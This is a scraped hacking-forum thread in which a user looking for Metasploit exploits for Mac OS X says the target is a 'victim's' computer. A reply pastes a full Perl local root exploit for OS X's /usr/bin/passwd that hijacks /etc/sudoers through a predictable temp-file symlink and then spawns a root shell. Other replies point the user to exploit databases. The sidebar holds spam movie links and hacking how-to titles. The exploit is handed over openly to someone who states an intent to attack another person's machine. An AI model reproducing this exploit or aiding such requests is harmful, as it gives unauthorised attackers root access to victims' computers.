Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
Like a Boss Movie 2019 Story _ImdB
0
Replies
3 min ago -
Forum Thread:
Just Mercy Movie Creeping to the Surface 15 Years Later
0
Replies
6 min ago -
Forum Thread:
Knives Out MOVIE 2019 Poster _IMdb
0
Replies
18 min ago -
Star Wars:
The Rise of Skywalker Movie 2020 Review _Imdb
0
Replies
24 min ago -
Forum Thread:
Little Women Movie 2019 Subtitles _imdB
0
Replies
27 min ago -
Forum Thread:
https://productscop.com/ksx-male-performance/
0
Replies
34 min ago -
Forum Thread:
Underwater Review - Telegraph
0
Replies
34 min ago -
Forum Thread:
Blue Screen Kali
5
Replies
1 hr ago -
Forum Thread:
Spies in Disguise Movie 2020 - an Occult Review - the Outsider
0
Replies
1 hr ago -
Forum Thread:
Just Mercy Movie 2019 Trailer _imDB
0
Replies
1 hr ago -
Ash vs Maleficent:
Mistress of Evil | Den of Geek
0
Replies
1 hr ago -
Forum Thread:
Star Wars the Rise of Skywalker Movie 2019 Budget _iMdb
0
Replies
1 hr ago -
Forum Thread:
Joker Movie 2020 Review _Imdb
0
Replies
2 hrs ago -
Jumanji:
The Next Level Movie (2019) Rating _imdb
0
Replies
2 hrs ago -
Forum Thread:
1917 Movie (2019) Cast _imDb
0
Replies
2 hrs ago -
Frozen II Review:
Taika Waititi Almost Transcends the Marvel-Verse
0
Replies
2 hrs ago -
Forum Thread:
Dolittle Movie (2020) Box Office _Imdb
0
Replies
2 hrs ago -
Forum Thread:
Ash vs Like a Boss | Den of Geek
0
Replies
2 hrs ago -
Forum Thread:
Bad Boys for Life Movie 2020 Review _IMDB
0
Replies
3 hrs ago -
Forum Thread:
Ash vs Knives Out | Den of Geek
0
Replies
3 hrs ago
-
How To:
Break into Router Gateways with Patator
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
How To:
Brute-Force SSH, FTP, VNC & More with BruteDum
-
How To:
Use SUDO_KILLER to Identify & Abuse Sudo Misconfigurations
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
How To:
Crack WPA & WPA2 Wi-Fi Passwords with Pyrit
-
How To:
Steal Ubuntu & MacOS Sudo Passwords Without Any Cracking
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Hack Android Using Kali (Remotely)
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
Steganography:
How to Hide Secret Data Inside an Image or Audio File in Seconds
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
Hack Like a Pro:
Windows CMD Remote Commands for the Aspiring Hacker, Part 1
-
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To:
Find Anyone's Private Phone Number Using Facebook
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts